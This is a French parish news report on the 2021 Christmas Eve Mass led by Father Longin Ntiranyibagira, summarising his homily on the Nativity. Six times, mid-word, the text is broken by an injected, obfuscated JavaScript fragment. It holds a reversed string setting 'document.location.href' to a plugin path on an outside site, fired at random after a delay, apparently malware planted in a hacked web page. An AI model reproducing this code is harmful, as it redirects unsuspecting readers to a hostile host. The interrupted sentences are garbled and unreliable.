La sainte Messe de la veillée de Noël 2021 a été présidée par le Père Longin NTIRANYIBAGIRA avec à ses côté onze autres prêtres aussi bien ceux de la communauté que des visiteurs. Le décor de l’église de la Sainte Trinité reflétait du blanc en prétoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominance avec des jeux de lumière et autres particularités qui faisaient ressentir la joie d’une si grandiose solennité que nul n’avait pas droit d’ignorer. La chorale Sancta Maria qui a animé les au cours de cette Messe avait combiné et apprêté tout l’arsenal musical nécessaire pour agrémenter la veillée. Les lectures de ce jour étaient respectivement tirées du Livre d’Isaïe (9, 1-6), de l’épitre se saint Paul apôtre à Tite (2, 11-14) et l’Evangile selon Saint Luc (1, 1-14).

Après la lecture des textes ci-haut mentionnées, le Père Longin a présenté son homélie qu’il a préféré commencé par un chant de Noël pour refaire sentir la joie circonstancielle à tout un chacun. ‘ Avec la naissance de Jésus sur la terre, le ciel et la terre se sont rencontrées et embrassées, même le peuple qui marchait dans les ténèbres a vu une lumière éclatante’, a précisé le Père Longin.  Cette rencontre entre ciel et terre, c’est que l’amour sans mesure de Dieu vient accomplir en nous, et nous chantons Gloria avec tous les saints el les anges du ciel. Selon le prophète Isaïe, toutes armes de guerre ont été détruites, et la terre est devenue comme le ciel grâce à la joie de cette fête que les anges proclament avec de belles voix depuis le ciel jusqu’à la terre. Ce Messie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous chantons la naissance en cette nuit vient changer tout pour le rendre neuf : l’insécurité sera changée en joie et la paix qui remplissent toute la terre.  Le mystère qui nous est difficile à comprendre c’est le fait que Dieu de toute puissance a accepté de se faire tout-petit dans un enfant qui physiquement ne peut rien. Mais ce mystère qui nous rassemble tous ensemble et nous fait des frères et sœurs de Jésus Christ et en Jésus Christ. ‘Avec Noël, toutes les lois toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent être observées et respectées. Le bel exemple du respect de la loi nous est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné par Joseph qui s’est rendu à Nazareth pour se faire recensé tel la loi l’exigeait, il était accompagné par Marie qui était sur le point toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner naissance au petit Jésus.

L’enfant Jésus vient rassembler toutes les personnes dans leurs familles pour prier, parler de la paix et planifier des projets de bienfaisance pour leurs prochains du voisinage, au service et partout où l’on passe’, a ajouté le Père Longin. Nous, en tant que chrétiens, sommes interpelés à nous arrêter et demeurer partout où nous voyons les signes ci-haut mentionnés car c’est là où Jésus est né. Nous ne devons pas ignorer que cet enfant a également des gens qui ne le comprennent pas du tout. Ce sont entre autre ceux qui commettent l’injustice, le meurtre et toute forme de mal. Nous ne cesserons pas de nous émerveiller devant l’abreuvoir où le petit enfant Jésus est couché, il a en fait voulu nous rassasier par sa petitesse. Il a accepté de nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner sa vie pour que nous vivions avec lui et en lui. Avec la naissance de Jésus, la lumière du Seigneur du Seigneur a éclaté en nous, en nos cœurs et dans nos âmes. Le Seigneur a fait rayonner en nous toute son assistance et sa protection. Il est droit dans tout ce qu’il fait, il est juste dans ses décisions et il ne passe pas outre la loi. Cependant, il rabaisse les puissants qui se complaisent dans leurs positions de privilège. ‘En ce jour, le Seigneur a essuyé les larmes de son peuple et tous les hommes diront voici le jour du salut car il nous a sauvés’, a conclu sa prédication le Père NTIRANYIBAGIRA.